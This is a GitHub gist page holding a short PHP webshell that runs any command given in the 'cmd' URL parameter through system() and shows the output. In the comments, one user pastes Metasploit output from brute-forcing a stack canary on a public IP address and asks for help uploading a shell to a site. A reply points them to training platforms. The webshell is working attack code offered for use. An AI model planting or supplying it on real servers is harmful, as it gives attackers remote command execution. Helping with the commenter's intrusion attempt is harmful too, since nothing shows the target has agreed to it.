Skip to content

Instantly share code, notes, and snippets.

@joswr1ght

joswr1ght/easy-simple-php-webshell.php

Last active June 2, 2025 15:08
Show Gist options
  • Save joswr1ght/22f40787de19d80d110b37fb79ac3985 to your computer and use it in GitHub Desktop.
Save joswr1ght/22f40787de19d80d110b37fb79ac3985 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
easy-simple-php-webshell.php
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{
system($_GET['cmd'] . ' 2>&1');
}
?>
</pre>
</body>
</html>
@craccbabyy
Copy link

metasploit [] Started reverse TCP handler on 10.0.2.15:4444 [] 81.70.92.51:80 - Searching for stack canary [] 81.70.92.51:80 - Assuming byte 0 0x00 [] 81.70.92.51:80 - Brute forcing byte 1 [+] 81.70.92.51:80 - Byte 1 found: 0x07 [] 81.70.92.51:80 - Brute forcing byte 2 [+] 81.70.92.51:80 - Byte 2 found: 0x01 [] 81.70.92.51:80 - Brute forcing byte 3 [+] 81.70.92.51:80 - Byte 3 found: 0x00 [+] 81.70.92.51:80 - Canary found: 0x00010700

[*] Exploit completed, but no session was created.

Any ideas how i can solve this?

just started ethical hacking and need to exploit a site vulnerability, upload a shell with file upload and download permissions and get a webshell for my project. and i am stuck here. Pointers would be much appreciated

would need more info like: host/OS info, what type of payload did you use? maybe try tryhackme or HTB academy, this is just a code repository

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment